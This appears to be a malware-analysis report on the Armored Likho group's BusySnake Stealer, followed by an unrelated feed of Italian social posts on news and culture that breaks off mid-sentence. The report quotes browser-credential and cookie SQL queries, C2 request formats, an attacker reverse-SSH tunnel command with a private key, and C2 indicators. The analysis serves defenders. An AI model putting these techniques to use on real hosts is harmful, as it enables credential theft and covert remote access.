In one attack variant, the archive contains a dropper named psihologicheskiy_test.exe, which is a self-extracting archive built using the Nullsoft Scriptable Install System (NSIS). When the victim opens the file, a decoy application launches to disarm suspicion by presenting a fake psychological survey. While we have observed similar droppers in the group’s previous campaigns, those earlier versions were written in Rust.

Once executed, the dropper writes a legitimate executable, $temp\nsn5531.tmp\pnx.exe, to disk and launches it. Code is then injected into the pnx.exe process memory to execute a malicious loader. This loader, in turn, fetches several archives hosted in GitHub repositories. Our analysis of these repositories uncovered early development builds and test samples of the malware. Data release in the repository is automated, allowing for rapid rotation of both payloads and the repositories themselves.

Payload repository example
Payload repository example

The downloaded archives are extracted into the $appdata\WindowsHelper directory. This serves as the malware’s working directory, where all subsequent components of the attack are staged and executed.

The fetched package contains the following components:

  • The primary payload: a stealer named module.pyw
  • The runtime directory with the components of the PyArmor execution environment
  • A Python 3.12 interpreter
  • The get-pip.py script: used to install the pip package manager and fetch required dependencies

Once executed, the script installs pip and pulls down the core dependencies required for the payload to run.

With all dependencies in place, the malware creates two VBScript files in the same $appdata\WindowsHelper directory. The first, wh_selfdelete.vbs, is used to wipe the initial pnx.exe loader from the system:

Loader removal script
Loader removal script

The second script, run.vbs, is designed to execute module.pyw and is used to ensure persistence on the system by creating a scheduled task:

Persistence script
Persistence script

This task ensures that the payload, BusySnake Stealer, is executed every five minutes.

LNK attachment


In alternate campaigns, the archive contains a file named Zayavka_[redacted].lnk. The group leveraged the ZDI-CAN-25373 shortcut vulnerability to conceal the contents of their command line. This flaw allows the attackers to use spaces or line breaks to hide execution parameters.

Consequently, when the user runs the malicious LNK file, it triggers the following obfuscated command:

Obfuscated PowerShell command
Obfuscated PowerShell command

This, in turn, spawns a PowerShell command that downloads and executes the malicious loader:

Downloading and executing the loader
Downloading and executing the loader

Upon execution, the loader downloads and opens a decoy DOCX document. We have observed various decoy themes, ranging from humanitarian aid requests to debt clearance certificates.


Decoy documents

Decoy documents

Once the decoy is displayed, the loader initializes the environment variables required to stage the next phase, including URL paths, installation directories, and required library manifests. While we observed variations across different first-stage payload samples, their core functionality remains identical.

Variable initialization example in loader code
Variable initialization example in loader code

Next, the loader fetches a Python 3.12 interpreter (python.zip), the get-pip.py script, and a data.zip archive containing the module.pyw payload. From this point, mirroring the first infection vector, the malware installs its dependencies and establishes persistence through a combination of a VBScript file and a scheduled task.

Example of downloading and installing Python and the pip package manager
Example of downloading and installing Python and the pip package manager

As shown in the screenshots, the loader’s source code contains verbose comments and bullet-point emojis. This coding style is highly uncharacteristic of human-developed malware. It strongly indicates that the group is leveraging LLMs to generate their malicious payloads.

Ultimately, both infection vectors lead to the execution of the primary payload, which we break down in detail below.

BusySnake Stealer


The primary payload in this campaign is a previously undocumented, Python-based infostealer that we have dubbed BusySnake Stealer.

The stealer’s source code implements multiple evasion techniques designed to thwart detection and complicate static analysis. Specifically, the BusySnake Stealer code is obfuscated and encrypted using PyArmor Pro version 9.2.0. The malware dynamically decrypts its bytecode only at the exact moment a function is called, re-encrypting the data immediately afterward. Additionally, the malware runs in the background without spawning a console window, as indicated by its PYW file extension.

During our analysis, we successfully stripped the protector and disassembled the executable functions. Below, we break down the stealer’s configuration and core functionality.

Before executing its main routines, the malware initializes its configuration file. It contains the C2 server address, directory paths, regular expressions, screenshot intervals, a User-Agent string for network communications, and many more. An example configuration from one of the captured samples is shown below.

Stealer configuration example
Stealer configuration example

The stealer’s architecture relies on handlers, each responsible for specific functions. The table below details the role of each handler.

Handler NameDescription
single_instance_lockPrevents multiple instances of the stealer from running concurrently on the compromised host.
start_key_clipboard_loggerSteals data from the system clipboard.
start_inventory_backgroundEnumerates files across the system and logs their metadata into a local database.
extract_hex64_from_fileAttempts to extract 64-character hexadecimal keys from the files.
start_send_documents_priority_backgroundForwards user documents to the C2 server.
take_screenshotCaptures screenshots and saves them to the SCREEN_DIR directory.
archive_pngsArchives captured screenshots and purges previously created archives from the disk.
poll_taskWaits for incoming C2 commands to execute.
ensure_schtaskChecks for the presence of a scheduled task to maintain persistence. If none is found, it drops a VBScript launcher and registers a new scheduled task.

Below, we break down the execution logic of the malware’s core functions.

Upon execution, the malware calls the single_instance_lock function to ensure that only one instance of the stealer is active on the system. To achieve this, the sample utilizes a non-standard lock-file algorithm, rather than traditional methods like creating a mutex or setting a registry value. The function first checks if the file Roaming\WindowsHelper\screenshots\.lock is locked by another process; if it is, the new instance fails to launch. If the file is not locked, the malware reads the Process ID (PID) stored within it. If that process doesn’t exist and the system uptime exceeds the file’s last modification timestamp, the stealer overwrites the lock file and proceeds with execution.

Immediately after initialization, the start_key_clipboard_logger function begins harvesting data from the system clipboard. The malware polls the clipboard contents in an infinite loop, appending any new or updated data to the KEYLOG_FILE using the following format:
[Clipboard] {timestamp} {escaped_clipboard_content}
Additionally, the stealer maps out the local file system using the start_inventory_background function.

This background process first initializes a database at Roaming\WindowsHelper\inventory_state.db. Within this database, the stealer generates a tracking table to log file metadata:
sqlite3.connect(STATE_DB_PATH)
execute CREATE TABLE IF NOT EXISTS scanned_files (path TEXT PRIMARY KEY,mtime REAL,size INTEGER)'
The malware then enumerates files and directories to build an object tree. During this scanning phase, the stealer explicitly skips core system directories, ignores files larger than 16 MB, and filters out files matching a hardcoded exclusion list of extensions.

Discovered files are passed to the extract_hex64_from_file function to scrape for 64-character hexadecimal keys. The malware opens each file in read mode and scans for strings matching the [0-9a-fA-F]{64} regular expression. Any identified keys are logged into the previously created database. The keys themselves are written to a separate file and forwarded to the C2 server. Once the full scan wraps up, a completion message is committed to the log file using the following format:
log(
f'Інвентаризація завершена за {elapsed:.1f}s. '
f'Нових: {counters["new"]}, '
f'Старих: {counters["skipped"]}, '
f'Знайдено: {counters["found"]}'
)
Next, the start_send_documents_priority_background function kicks off to map out logical drives. The malware identifies the system drive and recursively sweeps the user directories under /Desktop, /Documents, and /Downloads. During this enumeration phase, it filters the paths — checking only directories whose names start with $ and do not contain the string System Volume Information. Directory contents are also filtered based on an ignore list of extensions. The remaining files are then checked: if a file has not been previously sent and its size does not exceed 5 MB, it is transmitted to the C2 server.

The stealer maintains an active connection with the C2 server to await incoming instructions during execution. The poll_task function polls the C2 server in a continuous loop for new commands. Below is an excerpt of a typical request packet:
GET /get_task?client_id=DESKTOP-[redacted] HTTP/1.1\r\n
Host: 159.198.41.140
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0
The C2 sign-in form interface is shown below:

C2 administration panel sign-in form
C2 administration panel sign-in form

Commands are transmitted from the C2 server as function names, which are detailed in the table below:

Function NameDescription
handle_send_screenshots_commandCaptures screenshots at a designated interval, bundles them into an archive, and exfiltrates them to the C2 server.
send_and_clear_keystroke_logExfiltrates logged keystroke data to the C2 server and clears the log file afterward.
handle_extract_chromium_passwordsDecrypts stored passwords from Chromium-based browser databases using the DPAPI.
handle_extract_firefox_passwordsDecrypts passwords from Firefox databases by invoking the PK11SDR_Decrypt function.
handle_collect_and_send_cookiesExtracts cookies from browser databases and uploads them to the C2 server.
handle_extract_cookies_v7_commandExtracts cookies by installing an extension into the browser.
handle_search_2fa_secrets_commandScrapes for OTP keys by continuously monitoring the clipboard and parsing local files; if an otpauth:// string is matched, the key is logged to 2fa_secrets.txt.
handle_search_wallet_jsons_commandSweeps user directories to locate cryptocurrency wallet files with a JSON extension.
handle_split_and_send_tdata_commandHarvests Telegram session and credential data from the APPDATA/Telegram Desktop/tdata directory; it force-terminates the telegram.exe process, stages the files in a temporary directory, compresses them, and exfiltrates the archive to the C2 server.
handle_start_proxy_command / handle_stop_proxy_commandEstablishes a reverse SSH tunnel using an SSH command and private key previously received from the C2 server.
The second function terminates the connection and purges the key from the host.
handle_remote_control_commandChecks for an active installation of RustDesk on the endpoint. If missing, it downloads the application from GitHub. If already present, it restarts the RustDesk process to prompt the user to re-enter their ID and password, grabs a screenshot of the credentials, and exfiltrates the captured data to the C2 server.

After executing each command, the stealer sends a report back to the C2 server containing the task completion status.
POST /report_status HTTP/1.1
Host: 159.198.41.140
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 90
Content-Type: application/json
{"client_id": "DESKTOP-[redacted]", "command": "send_found_keys", "status": "ok", "note": ""}

Password exfiltration from Firefox and Chromium-based browsers


When BusySnake Stealer receives a C2 command to harvest passwords from Chromium-based browsers, it passes the task to the handle_extract_chromium_passwords function. The malware locates the specific browser data directory, verifies that it is not empty, and targets the Login State file, which contains the master key used to encrypt the local password database.

Locating the file containing the master key
Locating the file containing the master key

The master key is protected via the Windows Data Protection API (DPAPI). By operating within the security context of the user who originally encrypted the key, the stealer is able to decrypt it using the win32crypt.CryptUnprotectData() function.

Master key decryption
Master key decryption

Then, user accounts are extracted from the browser database via an SQL query, while passwords remain encrypted.
SELECT origin_url, username_value, password_value FROM logins
Next, the passwords are decrypted using a master key and saved in plaintext to the Roaming\WindowsHelper\chromium_passwords.json file.

For Firefox, the exfiltration workflow follows a similar logic. The stealer receives a command to extract browser credentials, which is then processed by the handle_extract_firefox_passwords function. The implant then scans the Mozilla\Firefox\Profiles directory and checks each user profile for the presence of both logins.json and key4.db. If either file is missing, the profile is skipped. The malware then parses the contents of logins.json, extracting the hostname, encryptedUsername, and encryptedPassword fields from each entry.

Credential extraction
Credential extraction

The extracted data is placed into a SECItem structure. Upon calling the NSS_Init() function, the NSS library — which Firefox relies on — automatically initializes its built-in cryptographic module and accesses the key4.db database. If the database is not protected by a master password, the module loads the signing key stored within it. In this scenario, the PK11SDR_Decrypt() function can successfully decrypt the credentials without requiring any user prompts or additional steps. Thus, BusySnake Stealer exploits insecure Firefox browser practices: storing the database master key in plaintext and the lack of re-authentication when decrypting data with it.

Credential decryption
Credential decryption

The decrypted credentials are saved directly to the Roaming\WindowsHelper\firefox_passwords.json file.

Cookie extraction


The stealer harvests cookies using a workflow nearly identical to its browser credential theft routine. Upon receiving the handle_collect_and_send_cookies command from the C2 server, the malware triggers the corresponding function. It then scans browser directories for the following database files: Cookies for Chromium-based browsers and cookies.sqlite for Firefox. Once located, it uses SQL queries to extract the cookies.

For Chromium-based browsers, the malware executes the following query:
SELECT host_key, name, value, encrypted_value, path, expires_utc FROM cookies
For Firefox, it uses this query:
SELECT host, name, value, path, expiry FROM moz_cookies
All harvested data is decrypted and saved to a file located at Roaming\WindowsHelper\all_browser_data.json, which is then exfiltrated to the C2 server and wiped from the host.

In addition to this method, the stealer fetches a supplementary module designed to extract cookies by installing a browser extension. Upon receiving the appropriate directive, the malware executes the handle_extract_cookies_v7_command function. It then pulls down the additional module as an archive from the Releases page of a GitHub repository, mirroring the initial staging process used by the stealer itself.

The source code of this secondary module is also protected with PyArmor. Once executed, the module spins up a local web server to capture and parse the cookies extracted from the browser. Next, the module creates the files for a browser extension used to steal cookies:

  • manifest.json: details the extension structure and required permissions
  • sw.js: contains the primary execution logic for the extension

Once these components are staged, the extension is installed into the browser.

Extension configuration file (manifest.json)
Extension configuration file (manifest.json)

Extension execution logic (sw.js)
Extension execution logic (sw.js)

To ensure Google Chrome launches with the extension installed, the module uses specific arguments to start the browser.

Chrome execution parameters
Chrome execution parameters

Once active, the extension verifies the availability of the local web server initialized during the previous stage. If the server is responsive, the extension reads the cookie data, stores it in a cookiesData object, and transmits it to the following URL:
127.0.0.1:8000/?data_type=c
The local server processes the incoming payload, saves it to a file named extracted_cookies.json, and subsequently exfiltrates it to the C2 server.

Reverse SSH tunneling


The group previously used a Go-based tool for creating reverse SSH tunnels, named Go2Tunnel by researchers. BusySnake Stealer implements a similar feature as a built-in function.

The implant receives a directive from the C2 server to establish a reverse SSH tunnel, routing the task to the handle_start_proxy_command function. The stealer initially sends a request to the following URL, appending the victim’s unique machine identifier to the request parameters:
https://grked[.]online/tunnel/create/?username=
[redacted]If the configuration specifies an HTTP endpoint instead of HTTPS, the URL format adjusts as follows:
http://grked[.]online:8000/tunnel/create/?username=
[redacted]In response, the server returns data containing all the parameters required to establish the tunnel.
{"username":"[redacted]","socks_host":"159.198.32[.]222","socks_port":26380,"private_key":
"BEGIN OPENSSH PRIVATE KEY\ nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW\nQyNTUxOQAAACDLcOYV2VpiBmn6KfPcA7w5k4LXxnDSUHwQ sMTd5TjQRAAAAJhSGysYUhsr\nGAAAAAtzc2gtZWQyNTUxOQAAACDLcOYV2VpiBmn6KfPcA7w5k4LXxnDSUHwQsMTd5TjQRA\nAAAEDHFs74hGkvUfzK/gL hfXdilmEnVbyD8V3Aqj5LRQdJJstw5hXZWmIGafop89wDvDmT\ngtfGcNJQfBCwxN3lONBEAAAAEXJvb3RAZjM3YzRjNjE4NjJjAQIDBA==\n
END OPENSSH PRIVATE KEY\n",
"ssh_command":"ssh -N -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 2222 -R 0.0.0.0:26380 [redacted]@159.198.32[.]222"}
The malware extracts the private key and the specific SSH command from this response. Using these components, it initiates a connection to a remote server controlled by the attackers, granting them persistent remote access and interactive control over the compromised host.

To close the tunnel, the stealer receives the handle_stop_proxy_command command and processes it with the function of the same name, after which the private key file is deleted and the associated SSH process is terminated.

New version of the BusySnake Stealer


During our infrastructure analysis of the threat actor, we uncovered a newer iteration of the stealer. The distribution method and static obfuscation mechanism remained unchanged; however, Armored Likho modified their TTPs and altered the code structure of BusySnake Stealer.

In the new version, instead of calling schtasks directly, the malware uses the win32com.client library to create scheduled tasks through interaction with the Schedule.Service COM object, indicating a shift toward less detectable execution methods.

Creating a scheduled task via the COM object
Creating a scheduled task via the COM object

This approach ensures a more stealthy persistence mechanism. Furthermore, to bypass dynamic analysis mechanism, the authors added a function that pauses execution before triggering malicious routines.

We also observed refinements to the architectural design of BusySnake Stealer. The attackers built a new task-management framework to handle incoming C2 commands. Each task is assigned a unique identifier, and before execution, the stealer checks for the presence of this task in a specified list. To track execution states in real time, tasks are dynamically assigned one of four operational statuses: SCHEDULED, IN_PROGRESS, SUCCEEDED, or FAILED.

The introduction of task execution statuses resulted in an updated C2 communication schema. The updated endpoints and request packet structure are detailed in the table below:

Handler NameEndpointRequest bodyDescription
poll_commands{Config.DASHBOARD_URL}/api/v1/client/
{Config.CLIENT_ID}/commands/?bid={Config.BUILD_ID}
Awaits new commands for execution
poll_tasks{Config.DASHBOARD_URL}/api/v1/client/
{Config.CLIENT_ID}/tasks/?bid={Config.BUILD_ID}
Awaits Python scripts for execution
set_task_status{Config.DASHBOARD_URL}/api/v1/client/
{Config.CLIENT_ID}/commands/{task_id}/
{
‘status’: status,
‘logs’: logs
}
Transmits task status updates
upload_file_once{Config.DASHBOARD_URL}/api/v1/client/
{Config.CLIENT_ID}/files/
{
‘file’:(file_name,io.BytesIO(text.encode(‘utf8’), ‘text/plain; charset=utf8’)
}
meta= {
‘name’: file_name,
‘file_type’: file_type,
‘task_id’:task_id
}
File exfiltration to the C2

One of the most significant architectural upgrades is the introduction of a dedicated class designed to execute arbitrary Python scripts. In this updated variant of the stealer, the poll_commands function is responsible for retrieving commands from the C2 server, while the poll_tasks routine is specifically dedicated to fetching Python scripts. Before running a retrieved script, the malware dynamically installs any required dependencies via pip. It then spawns a new process and executes the script’s code directly within memory without ever writing the file to disk — a technique intended to bypass security.

Attribution


We attribute this campaign to the Armored Likho threat group with medium confidence, basing our assessment on the analysis of the tools and network activity.

  1. In previously identified campaigns, the group used the Go2Tunnel tool designed to create reverse SSH tunnels. In BusySnake Stealer, similar functionality is implemented as a built-in feature. Both tools receive a tunnel establishment command and a private SSH key from the C2 server, while making requests to similar endpoints. Furthermore, both payloads initiate their tunnels using SSH commands with an identical set of arguments:
    -N -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p {port} -R 0.0.0.0:{port} {name}@{IPaddress}
  2. The Armored Likho group has historically deployed the AquilaRAT remote access Trojan. It shares a similar structure with BusySnake Stealer: the malware receives tasks from the C2 server, and their execution is carried out by dedicated handlers. Additionally, BusySnake Stealer and AquilaRAT utilize similar endpoints for C2 communications — for example, when reporting task execution statuses back to the server:
    AquilaRAT
    /backup/update-subtask-status
    {
    <..>
    'clientId': clientId,
    'subTasks': [
    <..>
    'taskItemId': taskItemId
    ]
    }
    BusySnake Stealer
    {Config.DASHBOARD_URL}/api/v1/client/{Config.CLIENT_ID}/tasks/{task_id}/
  3. Another structural overlap is seen in their persistence mechanisms. Both BusySnake Stealer and AquilaRAT maintain their footprint on compromised hosts by registering scheduled tasks that masquerade as legitimate Microsoft system utilities. While AquilaRAT typically names its task MicrosoftOfficeUpdate, BusySnake Stealer uses the name WindowsHelper.


Victims


We continue to actively monitor the ongoing deployment campaigns of BusySnake Stealer, alongside its related artifacts and network infrastructure.
To date, confirmed victims have been identified across Russia, Kazakhstan, and Brazil. The attacks are primarily focused on the governmental and electrical power infrastructure sectors.

Takeaways


An analysis of Armored Likho’s campaigns over the past few months shows a trend toward using AI tools to generate first-stage payloads, as indicated by redundant comments and code blocks. This allows the group to broaden its available attack vectors.

In parallel, the group is aggressively refining and modifying its core toolkit. While Go2Tunnel previously operated as a standalone utility, its reverse-tunneling functionality has now been integrated directly into the stealer as a built-in feature that ingests parameters from the C2 server. Furthermore, the structural design of this newly discovered stealer shares pronounced architectural overlaps with AquilaRAT, another staple tool in the group’s arsenal.

At the time of writing, Armored Likho remains highly active. Despite the evolution of their malware variants and their efforts to obfuscate their TTPs, we continue to closely monitor the group’s footprint and detect emerging campaigns.

Detection by Kaspersky solutions


Kaspersky security solutions, including Kaspersky Endpoint Detection and Response Expert, successfully detect and block the malicious activity associated with these attacks.

Defensive solutions detect the threat actor’s activity at the initial stage when the LNK downloader is executed. Upon execution, the shortcut runs an obfuscated command via rundll32.exe, which subsequently triggers a PowerShell command to pull down the second-stage payload. This malicious chain of events is caught by the following detection rules:


Example of LNK downloader detection in KEDR
Example of LNK downloader detection in KEDR

Example of LNK downloader detection in KEDR

The Kaspersky Cloud Sandbox solution can be used for a comprehensive analysis of the malicious activity described here. The figure below shows the Kaspersky Cloud Sandbox interface, demonstrating the event chain of the obfuscated command execution by the LNK downloader.

LNK downloader execution graph in Kaspersky Cloud Sandbox
LNK downloader execution graph in Kaspersky Cloud Sandbox

Additionally, inside Kaspersky Cloud Sandbox, it can be observed that during execution the stealer contacts remote URLs to download additional files, specifically a DOCX decoy document as well as the web_script.txt stager.

File downloads by the LNK downloader in Kaspersky Cloud Sandbox
File downloads by the LNK downloader in Kaspersky Cloud Sandbox

If the EXE dropper is executed, Kaspersky Cloud Sandbox also records the downloading of additional tools from a GitHub repository.

EXE dropper execution graph in Kaspersky Cloud Sandbox
EXE dropper execution graph in Kaspersky Cloud Sandbox

File downloads by the EXE dropper in Kaspersky Cloud Sandbox
File downloads by the EXE dropper in Kaspersky Cloud Sandbox

Furthermore, dynamic analysis results show that the sample writes an additional file to the disk, which is used in subsequent stages of the attack.

Malicious file written to disk by the EXE dropper in Kaspersky Cloud Sandbox
Malicious file written to disk by the EXE dropper in Kaspersky Cloud Sandbox

Indicators of compromise


Additional information about this threat is available to customers of the Kaspersky Threat Intelligence Reporting service. Contact: intelreports@kaspersky.com.

First-stage malicious files


5D5C3E483C5E544260CE98FC29FBF192 PS1 stager
7141917CBA2EEE2B4D31107FACCF3A39 EXE stager
F5C6434EE5F7578FAA3BC1257E1C9226 EXE stager
C019797A00FD56EDB1F468AC0A598510 BAT stager
A0EC7A8E61EFF3F445A7455B3AEF9FBB BAT stager
F5C6434EE5F7578FAA3BC1257E1C9226 EXE stager
7DB9C688C620E54E8C69B7E52A7579FB BAT stager

90378881856ABFA47D7745C0A3EF9DC8 RAR archive with advanced cookie extractor module

1DBA3E505491A260A44C867902C3296E RAR archive with malicious DLL loader

1096268FA2B3D454C86CF851CB782319 EXE dropper
F2AB09D7E7A375A192508A5014AA2EE4 EXE dropper
0041FD1B2358CD08DBCBC28EA8FC3D20 EXE dropper

894332174F536C2E1EFEDA05CBA79F8B DLL loader
78135F72AB148A0CC074F6B2DD51FFF6 DLL loader
07213C419489C02791E8D67B91E404EF DLL loader

393B498F2114CABC0B29D5FCD9DC6723 LNK
CF74AC018D158EA2C2CFA1B1D71D95BC LNK
2DFA1D949872C1B2F04952DD3E5F5D8F LNK

BusySnake Stealer


C7622A1EFFA27BBFEE6D6E03D6474343 PYW BusySnake Stealer
80B7700053E115D65365CE7330383320 New PYW version of BusySnake Stealer
6B45DDB39A6E86229348DCBBA3857E7C RAR archive with BusySnake Stealer
006887732CA4A4A46A97989CF4DEEEF6 RAR archive with BusySnake Stealer
732C31ACF971A81C7E51B2A3DAE82020 RAR archive with BusySnake Stealer
DDFF82A115558584BBD7741D4FFB35B4 RAR archive with BusySnake Stealer
8188B2F347B77D65D08CFB23808AC244 RAR archive with BusySnake Stealer
E2550CFAD9DCC880BF04F6048F90868C RAR archive with BusySnake Stealer
FD2BDD8047ADDEE6FDE2F532DE181BFD RAR archive with BusySnake Stealer

С2


winupdate[.]live
arvax[.]xyz
varenie[.]live
lvl99[.]store
onetoken[.]ink
winupdate[.]ink
grked[.]online
ndrt[.]ink
myboard[.]chickenkiller.com
myboard[.]twilightparadox.com

159.198.41[.]140
159.198.75[.]219
159.198.32[.]222
69.67.173[.]153


securelist.com/tr/armored-likh…

c'è chi diceva che gli attacchi ucraini alle raffinerie russe erano simbolici. forse all'inizio magari. ma sommato al fatto che i russi hanno problemi con le parti di ricambio per le riparazioni, oltreché con la manodopera, a me sembra che il fatto che adesso la russia importi carburante dimostri l'esatto contrario. al momento per quel che so possono solo continuare ad esportare petrolio alla cina a un prezzo molto di favore... come si dice... un gioiello è per sempre, e un danno fanno all'infrastruttura economica russa è per un po' di anni almeno.

Il Digital Ominbus tra competitività economica e arretramento delle garanzie fondamentali

Le notizie dal Centro Nexa su Internet & Società del Politecnico di Torino su @Etica Digitale (Feddit)

Analisi critica delle modifiche al GDPR e al quadro ePrivacy nella Proposta della Commissione europea COM(2025)837 final
The post Il Digital Ominbus tra competitività economica e arretramento delle garanzie fondamentali appeared first

Il maccartismo all’italiana: meno spettatori, più sudditi


@Giornalismo e disordine informativo
articolo21.org/2026/07/il-macc…
La Rai deve avere nella sua macchina qualche tasto adibito all’autodistruzione. Guai a rischiare di avere qualche successo editoriale. Meglio un’azienda che almeno dal 2023 perde la gara degli ascolti con

Verra ripristina un controverso progetto di crediti di carbonio in Kenya


@Notizie dall'Italia e dal mondo
Secondo Survival International, l’ente certificatore ha riattivato il progetto della Northern Rangeland Trust nonostante una sentenza ne abbia messo in discussione la base legale: milioni di crediti venduti anche a grandi aziende rischiano di coprire violazioni dei

Rebecca Kauffman – Vengo io da te
freezonemagazine.com/articoli/…
Questo è decisamente un romanzo che si concentra sulle dinamiche familiari e sulla quotidianità; lo stile di scrittura dell’autrice, empatico, attento all’animo umano e alle sue sfumature, ne fa un romanzo delicato ma pieno di umanità. Il romanzo è un’opera corale che segue per un anno, il 1995, le vicende di una famiglia allargata. I […]
L'articolo Rebecca Kauffman – Vengo io da te

Modern E-Ink Dashboards, Kindle and Otherwise


The media in this post is not displayed to visitors. To view it, please log in.

People have been attempting to turn Kindles into more than e-readers since the first devices came out nearly two decades ago. The e-ink displays are low-power and great for displaying information that doesn’t refresh too often, and with Amazon continuing their trend of bricking their older devices there will be more of these devices available. [Hemant] built a weather dashboard with one of his, but since then had requests for other types of e-reader dashboards and has a guide for making more general-purpose use of an old Kindle.

The first approaches outlined here involve the installation of a dashboard client on the Kindle and pointing it at a server that hosts a PNG image of whatever information needs to be displayed. The client simply displays that image and refreshes it at predetermined intervals. There are a number of options for creating that server as well, including using Home Assistant for those who already have a home automation system deployed. The benefit of using Home Assistant is that it’s much more straightforward to gather data for the dashboards from sensors and other peripherals that are already installed.

Installing a client like this might seem straightforward, and it can be, provided that the Kindle involved is jailbroken or capable of being jailbroken. An Amazon update recently broke many modern devices’ ability to execute the jailbreak, so not every Kindle can do this anymore. But [Hemant] goes into detail about this and also outlines some methods for using generic e-ink displays instead, and also dives into the hardware and software behind building a server to host the dashboard images for those without Home Assistant already running. It’s a great overview for those who have always wanted something like this but never knew where to start.


hackaday.com/2026/07/03/modern…

In difesa di un metodo e di un’idea


@Giornalismo e disordine informativo
articolo21.org/2026/07/in-dife…
Sarò breve, e stavolta non è un artificio retorico. Sarò breve perché prima e meglio di me si sono già espresse altre e altri, che di RAI se ne occupano da una vita e in alcuni casi vi hanno lavorato per quasi mezzo secolo. Sarò breve perché ho poco da aggiungere, se

Join the Arizona Pirate Party’s Protest on July 6th


The media in this post is not displayed to visitors. To view it, please log in.

July 2nd

On Monday, July 6th, the Arizona Pirate Party will be protesting the current plan from Indian Health Services (IHS) to shut down the only health clinic in Tucson, which services 28,000 tribal members.
July 6th, 9am-11am
The federal government is legally required to provide these health services under its treaty with Native American tribes.

Join the Arizona Pirate Party on Monday, July 6th, from 9am-11am at easternmost entrance of the Sikolk Wog & San Xavier. Parking will be available on the shoulder of the road.

The AZPP is protesting to demand that lawmakers maintain these important health services to the Tohono O’odham and Pascua Yaqui Tribes.

The United States Pirate Party stands with the stated goals of the protest, and wish the Arizona Pirates all the best in their protest.

You can join the AZPP here!


uspirates.org/join-the-arizona…

Elezioni e Politica 2026 reshared this.

Mundial FIFA 2026: Kane salvó a Inglaterra, remontada histórica de Bélgica.


Bélgica logró una remontada épica ante Senegal, Inglaterra reaccionó a tiempo contra RD Congo, y a Estados Unidos no le tembló el pulso para clasificar a octavos de final.

#Mundial 2026
deporshow.blogspot.com/2026/07…

Acqui Rock Festival 2026: sei band per una notte agli Archi Romani

Venerdì 10 luglio 2026 il Parco Archi Romani di Acqui Terme (AL) ospita una nuova edizione dell'Acqui Rock Festival: sei band in un'unica serata, ingresso libero, cancelli aperti dalle 18. Una line-up costruita non per rappresentare un genere ma una direzione, quella di una scena underground che si muove tra pesantezza e melodia senza chiedere permesso. Il motto scelto dall'organizzazione dice già tutto: bury the hype, worship the riff.

iyezine.com/acqui-rock-festiva…

2025, la testimonianza da Gaza del Dott. Goher Rabhour, ripresa da Alfredo Facchini
(da fb)

DOTTORE, POSSO MORIRE?

Ieri mi ha attraversato un senso di impotenza che non provavo da tempo. Ho guardato quello che faccio ogni giorno: leggere, verificare, scrivere, pubblicare, cercare, a modo mio, di incrinare il muro del silenzio sul genocidio di Gaza. E mi sono chiesto: a che serve? Sono una goccia nel mare.

Una voce quasi impercettibile dentro un frastuono assordante di propaganda e indifferenza. È una domanda che ti scava dentro. Perché mentre tu scrivi, là si continua a morire. E allora il dubbio diventa feroce: che senso ha continuare?

Poi è arrivata la notte. Stamattina, però, mi sono svegliato con una risposta diversa. Non più sconforto. Rabbia. Una rabbia lucida. Mi è tornata sotto gli occhi un’intervista di Francesca Mannocchi che pubblicai il 2 luglio dell’anno scorso al chirurgo britannico Goher Rahbour, appena rientrato da un mese trascorso nell’ospedale Nasser di Khan Younis. Un uomo che ha visto con i propri occhi il cratere dell’inferno e ha scelto di raccontarlo. Agghiacciante.

Allora mi sono detto: falla finita con la rassegnazione. Sarai pure una goccia, ma continua a cadere. È il minimo che puoi fare. Perché non riuscirai a spostare di un millimetro l’ordine delle cose, ma puoi sempre decidere da che parte stare fino in fondo.

Ricordatevi una frase su tutte: «Un ragazzo di 15 anni, paraplegico, mi ha chiesto: “Dottore, posso morire, per favore?”»

Alfredo Facchini

Vorrei che ci descrivesse cosa ha visto dentro e fuori l’ospedale Nasser?

«Partiamo da fuori. Macerie, distruzione. È vero che vediamo queste cose in diretta da venti mesi, ma quando le vedi da vicino realizzi cosa significhi davvero il termine “apocalittico”. Per me sono le persone, adulti e bambini, che camminano pelle e ossa, scalzi in mezzo alle macerie. La fame che cammina tra le rovine.»

Ci può raccontare la vita ordinaria dell’ospedale Nasser?

«Nell’ospedale manca tutto. Quindi il tuo quotidiano, come medico, è fronteggiare le mancanze più semplici: soluzioni antisettiche per lavarsi, antibiotici, mancano le garze in sala operatoria, quelle per l’addome, per i pazienti che sanguinano molto. Non ci sono. Aspiratori, farmaci anestetici: non ci sono. Il quotidiano diventa cominciare a usare anestetici scaduti, così capita che pensi che il tuo paziente stia dormendo mentre lo operi, e invece, durante l’intervento, comincia a muoversi.»

In quali reparti dell’ospedale Nasser ha lavorato?

«Nel reparto oncologico e nella nutrizione. Avevo pazienti con tumori in stadi avanzati che non hanno avuto trattamenti per mesi. Manca la chemioterapia. Sono tumori che progrediscono rapidamente, con metastasi al fegato, ai polmoni, alle ossa. Su pazienti che non puoi operare, quando devi decidere se operare o meno, hai bisogno di una risonanza magnetica, ma non ce n’è più una in tutta Gaza. Ho incontrato l’unico oncologo rimasto a Gaza, il dottor Zaki. E, sai, quando incontri qualcuno per la prima volta, gli chiedi: “Come va?” E lui diceva soltanto: “Molto male. Molto, molto male.” Una risposta che era già scritta sul suo volto. Immagina ricevere ogni giorno, da venti mesi, pazienti oncologici che arrivano in ospedale chiedendo la chemioterapia, e tu per venti mesi devi rispondere: “Mi dispiace, non ho farmaci. Non ho medicine. Non posso aiutarti.” L’altra questione è la nutrizione. Gli abitanti di Gaza non hanno frutta, verdura, carne, pesce da almeno quattro mesi, da quando è finita la tregua. All’interno dell’ospedale, per gli adulti non c’è nutrizione. In Italia o nel Regno Unito, ai pazienti viene somministrata nutrizione per via endovenosa o tramite sondino nasogastrico. Ma per gli adulti, lì non c’è niente di tutto questo. Non possiamo nutrirli. Ma la parte più 